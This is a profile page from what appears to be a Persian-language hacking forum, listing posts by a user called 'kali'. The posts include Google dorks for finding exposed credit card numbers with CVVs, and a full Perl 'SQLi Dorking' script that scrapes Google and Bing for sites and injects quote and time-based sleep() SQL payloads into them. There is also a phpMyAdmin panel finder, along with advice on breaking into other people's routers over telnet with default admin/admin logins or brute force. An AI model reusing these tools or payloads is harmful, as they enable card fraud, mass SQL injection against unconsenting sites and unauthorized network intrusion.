رفتن به مطلب
انجمن تیم امنیتی گارد ایران

kali

کاربر تازه وارد
  • تعداد ارسال ها

    25
  • تاریخ عضویت

  • آخرین بازدید

6 دنبال کننده

درباره kali

  • درجه
    1
  • تاریخ تولد تعیین نشده

آخرین بازدید کنندگان نمایه

587 بازدید کننده نمایه
  1. kali

    درود کارتون زیبا هست برا منم از امکان هست یکی طراحی کنید رنگ قرمز لقب :Kali
  2. درود همنطور که ادمین گفتن بهترین گزینه همون wp-scan CMSmap vane-master اخری به زبان روبی هستش
  3. kali

    درود با اجازه ادمین با نرم افزار hydra اگه یوزر بن شد چی ؟در اثر تست پسورد دو اینکه شما پسورد گیر اوردی اگه از روش گوشی استفاده کرده (شماره برا گوشی طرف سند میشه ) بود اون موقع میخوایی چیکار کنی ؟
  4. سلام در این آموزش با استفاده از دورک زیردر گوگل سرچ کنند میتوانید کارت اعتباری یوزر پسورد دریافت کنید intext:exp: | expired: credit card number: cvv: ext:txt 2018 intext:exp: | expired: credit card number: cvv: ext:txt 2017 intext:exp: | expired: credit card number: cvv: ext:txt 2016 intext:exp: | expired: credit card number: cvv: ext:txt 2015 intext:exp: | expired: credit card number: cvv: ext:txt 2014 اگه یوزر عادی چیزی نفهمیدن بگین یک فیلم آموزشی بسازم
  5. به علت گرفتاری پیش آمده چندروز Dow هستم .!!!

  6. kali

    عثت، امید انسان به فردایی روشن است. بعثت، نشانه مهرورزی خدا با خاکیان و باران رحمت بی‌‌حد او بر زمینیان است. بعثت پیامبر اکرم(ص) مبارک باد
  7. kali

    سلام حدمت تمامی دوستان اینم اسکریپ به زبان پرل کارش چیه ؟ دورک Sql injention سرچ میکنه و سایتهای باگدار و آسیب پذیر رو براحتی بهتون نشون میده. از سایتی مثل Google Dork Bing Dork سرچ میزنه طرز استفاده sqliDorking.pl -d inurl:product.php?id= -p 3اسکریپ#!/usr/bin/perl################################## SQLi Dorking ## Autor: Crozz Cyborg ## ## Copyright 2014 Crozz Cyborg ##################################use strict;$| = 1;$SIG{'INT'} = \&Interrupt;# Modulos/Libreriasuse HTTP::Request;use LWP::UserAgent;use Getopt::Long;use Benchmark;use POSIX;use threads;use Time::HiRes "usleep";# Variablesmy @UserAgents = ('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0','Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0','Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)','Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14','Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14');my ($Dork,$BingDork,$List,$NumPaginas,$FileLinks,$Proxy);my ($proceso,@ProTime);my $result = GetOptions( 'gd=s' => \$Dork, 'bd=s' => \$BingDork, 'l=s' => \$List, 'p=s' => \$NumPaginas, 'f=s' => \$FileLinks, 'prx=s' => \$Proxy);# INI Funcionessub Uso(){ die <<EOTXT;\rUso: $0 [-d dork] -p <paginas> [-l archivo.txt] [-f archivo] -gd <Dork> Google Dork -bd <Bing> Bing Dork -l <Archivo> Archivo con links para analizar -p <paginas> Numero de paginas para buscar -f <archivo> Archivo donde se guardaran los logsEjemplo: $0 -d inurl:product.php?id= -p 3Mas informacion escribe: perldoc $0EOTXT}sub LinksByDork(){ my @Links; my $Paginas = $Dork ? 0 : 1; my ($carga,$porcentaje) = ("",0); $proceso = 'dork'; print "Dork: $Dork$BingDork\n"; foreach(my $pag = 0;$pag <= $NumPaginas;$pag++){ my ($HTML,$Link,@Data); printf("\r[%-50s] %3i%%",$carga,$porcentaje < 100 ? ceil($porcentaje) : floor($porcentaje)); $porcentaje += (100/$NumPaginas); $carga = "=" x ($porcentaje < 100 ? ceil($porcentaje)/2 : floor($porcentaje)/2); my $time1 = new Benchmark; if($Dork){ $HTML = &Navegar('http://www.google.com/search?q='.$Dork.'&start='.$Paginas,$Proxy); } elsif($BingDork){ $HTML = &Navegar('http://www.bing.com/search?q='.$BingDork.'&first='.$Paginas,$Proxy); } my $time2 = new Benchmark; push(@ProTime,${timediff($time2,$time1)}[0]); if($HTML =~ m/Our systems have detected unusual traffic from your computer/i){ $HTML =~ /IP address\: (\S+)\<br/i; print "\rDetectado trafico \"inusual\" de la IP $1\ncambiala para continuar [(C)ambiar a Bing/(Q)uitar/Continuar[Enter]] "; chomp(my $CQ = <STDIN>); if($CQ =~ /q/i){ if($#Links > 0){ @Links = &EliminarRep(@Links); return @Links }else{exit} } elsif($CQ =~ /c/i){ $BingDork = $Dork; $Dork = 0; $Paginas += 1; $HTML = &Navegar('http://www.bing.com/search?q='.$BingDork.'&first='.$Paginas,$Proxy); } else{ print "Continuando...\n"; $pag--; next } } if($Dork){ @Data = $HTML =~ m/href="\/url\?q=([-.:%?=&\/\w]+)\&sa=U&/gi; } elsif($BingDork){ @Data = $HTML =~ /<h3><a href="([-.:%?=&\/\w]+)"/mgi; } foreach $Link(@Data){ if($Link !~ m/google.com/i && $Link !~ m/googleusercontent.com/i && $Link !~ m/msn.com/i && ($Link =~ m/\%3[fF]\w+%3[dD]\w+/ || $Link =~ /\?\w+=\w+/)){ $Link =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $Link =~ s/https:\/\//http:\/\//g; push(@Links,$Link); } } $Paginas += 10; } print "\n\n"; @Links = &EliminarRep(@Links); return @Links}sub LinksByList(){ my @Links; $NumPaginas = 15; open(LIST,"$List"); while(<LIST>){ chomp; $BingDork = "site:$_"; push(@Links,LinksByDork()); } close(LIST); return @Links}sub Navegar(){ my ($URL,$UseProxy) = @_; my ($UA,$Req,$Resp,$Contenido); $UA = LWP::UserAgent->new; $UA->agent($UserAgents[int(rand($#UserAgents+1))]); $UA->timeout(10); $URL =~ /^http\:\/\/([\w\.]+)\/*/; $UA->default_header('Host' => $1); $UA->default_header('Accept' => 'text/html'); $UA->default_header('Accept-Language' => 'en-US,en;q=0.5'); $UA->default_header('DNT' => '1'); $UA->default_header('Connection' => 'close'); $UA->proxy('http' => "http://$UseProxy") if $UseProxy; $Req = HTTP::Request->new(GET => $URL); $Resp = $UA->request($Req); return 0 unless($Resp->is_success); $Contenido = $Resp->content(); return $Contenido}sub SQL(){ my $Link = shift; my @Edit = split('\?',$Link); # Separa variables de la url my @Variables = split('&',$Edit[1]); # Separa por pares variable=valor my %Vars = map {split('=',$_)} @Variables; # Almacena variable = valor en el hash %Vars my $LinkMod; my @HTML = (undef) x 3; foreach my $Var(keys %Vars){ $LinkMod = &ModLink($Edit[0],@Variables,$Var," '"); # Se modifica el link para inyectar el codigo ' en la variable $Var my $time1 = new Benchmark; unless($HTML[0] = &Navegar($LinkMod)){ return 0; } my $time2 = new Benchmark; my $time3 = ${timediff($time2,$time1)}[0]; #push(@ProTime,${timediff($time2,$time1)}[0]); if($HTML[0] =~ m/You have an error in your SQL syntax/i){ my @Ret = ($Link,$Var,"'",$ProTime[$#ProTime]); return \@Ret; } elsif($HTML[0] =~ m/supplied argument is not a valid MySQL/i){ my @Ret = ($Link,$Var,"'",$ProTime[$#ProTime]); return \@Ret; } my ($tmp,$aumento); $tmp += $_ foreach(@ProTime); $tmp = int($tmp/($#ProTime+1)); $aumento = $time3 >= ($tmp+3) ? 10 : 5; foreach(("' and sleep(".($time3+$aumento).") and '1' = '1"," and sleep(".($time3+$aumento).") and 1 = 1")){ $LinkMod = &ModLink($Edit[0],@Variables,$Var,$_); my $time1 = new Benchmark; unless($HTML[0] = &Navegar($LinkMod)){ next; } my $time2 = new Benchmark; my $timedif = timediff($time2,$time1); if($$timedif[0] >= ($time3+$aumento)){ my @Ret = ($Link,$Var,$_,$$timedif[0]); return \@Ret; } } } return 0}sub ModLink(){ my $Host = shift; my @Variables = shift; my $Var = shift; my $Code = shift; my %Vars = map {split('=',$_)} @Variables; my $LinkMod = $Host.'?'; foreach (keys %Vars){ if($Var eq $_){$LinkMod .= "$_=".$Vars{$_}." $Code&";} else{$LinkMod .= "$_=".$Vars{$_}."&";} } chop($LinkMod); return $LinkMod;}sub EliminarRep(){ my @Links = @_; my @HP1; my @HP2; for(my $i = 0;$i <= $#Links;$i++){ @HP1 = split('\?',$Links[$i]); for(my $x = $i;$x <= $#Links;$x++){ @HP2 = split('\?',$Links[$x]); if($i != $x && $HP1[0] eq $HP2[0]){ splice(@Links,$x,1); $x-- if $x != 0; } } } return @Links;}sub Logs(){ if(open(LOGS,">>${$_[0]}")){ print LOGS "$_[1]\n"; close(LOGS); } else{ print "No se puede escribir en el archivo '${$_[0]}' $!"; print "Especifica otro archivo: "; chomp(${$_[0]} = <STDIN>); }}sub Interrupt(){ print "\n\n1) Cambiar proxy\n2) Cambiar dork\n3) Salir\n\n\$> "; chomp(my $resp = <STDIN>); if($resp == 1){print "Nuevo proxy: ";chomp($Proxy = <STDIN>)} elsif($resp == 2){print "Nueva dork: ";chomp($Dork = <STDIN>)} elsif($resp == 3){print "Finalizando\n";exit} else{print "Opcion invalida\n";}}# End Funcionessub main(){ my @Links; my @LinkSQLi; my @t = (4,8,10); my @c = ("\e[1;32m","\e[0;32m"); my $nc = 0; print "Obteniendo links..."; if($Dork){ Uso() unless $NumPaginas; if($BingDork){ print "\rSolamente puedes usar un buscador!\n"; Uso(); } print "\n";push(@Links,LinksByDork()); } elsif($BingDork){ Uso() unless $NumPaginas; if($Dork){ print "\rSolamente puedes usar un buscador!\n"; Uso(); } print "\n";push(@Links,LinksByDork()); } elsif($List){ print "\n";push(@Links,LinksByList()); } else{ Uso(); } print "Escaneando ".($#Links+1)." links...\n\n" if $#Links > 0; foreach(@Links){ my $thr1 = threads->create(\&SQL,$_); while($thr1->is_running()){ for(("/","-","\\","|")){ print $_; usleep(80_000); print "\b"; } } my $Datos = $thr1->join(); if($Datos){ foreach(0..2){ $t[$_] = length($$Datos[$_]) if($t[$_] < length($$Datos[$_])); } printf("Link: %s Var: %s Payload: %s Time: %s\n",$$Datos[0],$$Datos[1],$$Datos[2],$$Datos[3]); &Logs(\$FileLinks,"Link: $$Datos[0] Var: $$Datos[1] Payload: $$Datos[2]") if $FileLinks; push(@LinkSQLi,$Datos); } } if(@LinkSQLi and $^O eq "linux"){ printf("\n" x 5); printf("+%s+%s+%s+\n","-" x ($t[0]),"-" x ($t[1]),"-" x ($t[2])); printf("|\e[0;33mLink%s\e[0m|\e[0;33mVar%s\e[0m|\e[0;33mPayload%s\e[0m|\n"," " x ($t[0]-4)," " x ($t[1]-3)," " x ($t[2]-7)); printf("+%s+%s+%s+\n","-" x ($t[0]),"-" x ($t[1]),"-" x ($t[2])); foreach my $l(@LinkSQLi){ printf("|$c[$nc % 2]%-${t[0]}s\e[0m|$c[$nc % 2]%-${t[1]}s\e[0m|$c[$nc % 2]%-${t[2]}s\e[0m|\n",$$l[0],$$l[1],$$l[2]); $nc++; } printf("+%s+%s+%s+\n","-" x ($t[0]),"-" x ($t[1]),"-" x ($t[2])); system("notify-send \"SQLi Dorking\" \"Escaneo finalizado con ".($#LinkSQLi+1)." vulnerables\" -t 10000"); } elsif(@LinkSQLi and $^O eq "MSWin32"){ printf("\n" x 5); printf("+%s+\n","-" x ($t[0])); printf("|Link%s|\n"," " x ($t[0]-4)); printf("+%s+\n","-" x ($t[0])); foreach my $l(@LinkSQLi){ printf("|%-${t[0]}s|\n",$$l[0]); } printf("+%s+\n","-" x ($t[0])); } else{ print "No se encontraron paginas vulnerables\n"; system("msgbox * \"Escaneo finalizado con ".($#LinkSQLi+1)." vulnerables\""); }}main();__END__=head1 NombreSQLi Dorking=head1 VersionVersion: 1.1 Beta=head1 AutorCrozz Cyborg=head1 DescripcionBusca paginas vulnerables a SQL (usa google)=head1 UsosqliDorking.pl [-d/-bd <dork>] -p <paginas> [-l Links.txt] [-f Logs.txt]=head2 Opciones -gd <Dork> Google Dork -bd <Bing> Bing Dork -l <Archivo> Archivo con links para analizar -p <paginas> Numero de paginas para buscar -f <archivo> Archivo donde se guardaran los logs=head2 Ejemplos de usosqliDorking.pl -gd inurl:product.php?id= -p 3 -f VulneSQL.txtsqliDorking.pl -l links.txt -f VulneSQL.txtsqliDorking.pl -bd inurl:product.php?id= -p 3sqliDorking.pl -l links.txt=head2 Archivo Links.txtEl archivo links.txt puede tener cualquier otro nombre, en cuanto al formato debe de tener 1 nombre de dominio por linea, ejemplo de dominio: victima.com
  8. سلام برای دوستان اسکریپت پرل برای پیدا کردن صفحه PHPmyadmin قرار دادم . امیدوارم خوشتون بیاد. #!/ usr/bin/perl #*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* # # //////////////////////////////////// # Yakamoz PHPmyadmin Finder v.x.x # //////////////////////////////////// # # Title : PHPmyadmin Finder # Author: Bl4ck.Viper # From : Azarbycan # Category : Remote # Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com # #*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* use HTTP::Request; use LWP::UserAgent; system ("cls"); system ("title Bl4ck.Viper (Yakamoz)..."); print "\t\t/////////////////////////////////////////////////\n"; print "\t\t_________________________________________________\n"; print "\t\t\t PHPmyadmin Finder v.x.x\n"; print "\t\t\t Coded By Bl4ck.Viper\n"; print "\t\t\t Made In Azarbycan\n"; print "\t\t\t Version In English\n"; print "\t\t_________________________________________________\n"; print "\n\n"; sleep (1); print "\n\n"; print "\t HOST=> (ex: http://www.site.com)\n"; print "\t HOST=> :"; $host= ; chomp($host); if($host !~ /http:\/\//) { $host = "http://$host"; }; print "\n\n"; print "\t\t*-*-*-*-*-* Scanning *-*-*-*-*-*\n"; print "\n\n"; @p = ("/phpMyAdmin/", "/phpmyadmin/", "/PMA/", "/admin/", "/dbadmin/", "/mysql/", "/myadmin/", "/phpmyadmin2/", "/phpMyAdmin2/", "/phpMyAdmin-2/", "/php-my-admin/", "/phpMyAdmin-2.2.3/", "/phpMyAdmin-2.2.6/", "/phpMyAdmin-2.5.1/", "/phpMyAdmin-2.5.4/", "/phpMyAdmin-2.5.5-rc1/", "/phpMyAdmin-2.5.5-rc2/", "/phpMyAdmin-2.5.5/", "/phpMyAdmin-2.5.5-pl1/", "/phpMyAdmin-2.5.6-rc1/", "/phpMyAdmin-2.5.6-rc2/", "/phpMyAdmin-2.5.6/", "/phpMyAdmin-2.5.7/", "/phpMyAdmin-2.5.7-pl1/", "/phpMyAdmin-2.6.0-alpha/", "/phpMyAdmin-2.6.0-alpha2/", "/phpMyAdmin-2.6.0-beta1/", "/phpMyAdmin-2.6.0-beta2/", "/phpMyAdmin-2.6.0-rc1/", "/phpMyAdmin-2.6.0-rc2/", "/phpMyAdmin-2.6.0-rc3/", "/phpMyAdmin-2.6.0/", "/phpMyAdmin-2.6.0-pl1/", "/phpMyAdmin-2.6.0-pl2/", "/phpMyAdmin-2.6.0-pl3/", "/phpMyAdmin-2.6.1-rc1/", "/phpMyAdmin-2.6.1-rc2/", "/phpMyAdmin-2.6.1/", "/phpMyAdmin-2.6.1-pl1/", "/phpMyAdmin-2.6.1-pl2/", "/phpMyAdmin-2.6.1-pl3/", "/phpMyAdmin-2.6.2-rc1/", "/phpMyAdmin-2.6.2-beta1/", "/phpMyAdmin-2.6.2-rc1/", "/phpMyAdmin-2.6.2/", "/phpMyAdmin-2.6.2-pl1/", "/phpMyAdmin-2.6.3/", "/phpMyAdmin-2.6.3-rc1/", "/phpMyAdmin-2.6.3/", "/phpMyAdmin-2.6.3-pl1/", "/phpMyAdmin-2.6.4-rc1/", "/phpMyAdmin-2.6.4-pl1/", "/phpMyAdmin-2.6.4-pl2/", "/phpMyAdmin-2.6.4-pl3/", "/phpMyAdmin-2.6.4-pl4/", "/phpMyAdmin-2.6.4/", "/phpMyAdmin-2.7.0-beta1/", "/phpMyAdmin-2.7.0-rc1/", "/phpMyAdmin-2.7.0-pl1/", "/phpMyAdmin-2.7.0-pl2/", "/phpMyAdmin-2.7.0/", "/phpMyAdmin-2.8.0-beta1/", "/phpMyAdmin-2.8.0-rc1/", "/phpMyAdmin-2.8.0-rc2/", "/phpMyAdmin-2.8.0/", "/phpMyAdmin-2.8.0.1/", "/phpMyAdmin-2.8.0.2/", "/phpMyAdmin-2.8.0.3/", "/phpMyAdmin-2.8.0.4/", "/phpMyAdmin-2.8.1-rc1/", "/phpMyAdmin-2.8.1/", "/phpMyAdmin-2.8.2/", "/sqlmanager/", "/mysqlmanager/", "/p/m/a/", "/PMA2005/", "/pma2005/", "/phpmanager/", "/php-myadmin/", "/phpmy-admin/", "/webadmin/", "/sqlweb/", "/websql/", "/webdb/", "/mysqladmin/", "/mysql-admin/"); foreach $myadmin(@p){ $url = $host.$myadmin; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success){print "Found : $url\n";} if ($response->content=~ /Access Denied/){print "Found : $url =>[Error & Access Denied]\n";} else {print "NotFound : $myadmin\n";} }
  9. سلام تمامی اعضای گروه در این آموزش تصویری در خدمت دوستان آموزش jsqlابزاری برای انجیک کردن باگ sqlهست هرکار کردم ابلود نشد داخل سایت
  10. kali

    اسکریپت شل فایندر قوی براتون قرار دادم با این ابزار میتونید ادرس سایت مورد نظر بدهید اگه شل ابلود شده باشه از قبل لینکشو به شما میده عکس از محیط برنامه Find Shell.rar
  11. kali

    دوستمون سوالش مشخص نیست بالا میگه تنظیمات وایفای نمیگه تنظیمانت مودم ================================== خب من اگه می تونستم به وایرلس کانکت بشم مشکلی نداشتم. رمز صفحه کانفیگو دارم نه خود مودم دوم اینکه رمز صفحه کانفیگ داری همون تنظیمات مودم میشه پس دوست عزیز شما با داشتن ای پی طرف میشه نفوذ کرد البته اگه پورت 23 باز باشه بشه تلنت زد ای پی میگم نکه 192.168.1.1 همون رنج مثلا مخابرا ت میده مثلا 2.150.1.50 با با پورت اسکنر چک میکنی اونایی پورت 23 باز باشه میشه تلنت زده اما صفحه لوگین پیش فرض admin admin باشه یک راه دیگه یا اکسپلویت هست زمانی که لوگین 19.168.1.1 از حملات برت فورس استفاده کرده که اونو مستاسفم نمیشه باز کرد
  12. kali

    درود اگه میخوای وارد تنظیمات مودم هدف بشین اگه شما رمز وارد کنی به وایرلس طرف کانکت بشی وقتی 192.168.1.1 بزنی میتونی به مودم طرف نفوذ کنی تغییرات اعمال کنی شما اول وصل وایراس شو بعد ای پی بزن
  13. درود تمامی دوستان با آموزش تصویری اسکنر جدید Kali Linux Tools-CMSmap در خدمت دوستان هستیم ​به زبان python هستش این اسکنر اسیپ پذیری انواع cms wordpress Drupal Joomla تست میکنه صبور باشید اپلود کنم آموزشو برا دوستان
  14. kali

    منظورتون اینه باید رو فلش کالی نصب کنم ن بصورت لایو ؟؟ منظورم رو کروم فایر نبود ابزار دیگه هست وقتی دانلود میکنم رانش میکنم برا بار دوم فلش ران میکنم نیست
  15. درود دوستان یک سوال داشتم در مورد سیستم عامل کالی سوال این بود که من سیستم عامل رو فلش بوت میکنم بالا میاد درست کار میکنه اما چون سیستم عامل تازه هست میام کروم یا نرم افزار دیگه نصب میکنم میخواستم ببینم میشه کاری کرد زمانی که بار دوم بالا میارم از رو فلش دوباره همین ابزار امکات رو فلش بوت بشه ؟؟؟؟
×
×
  • جدید...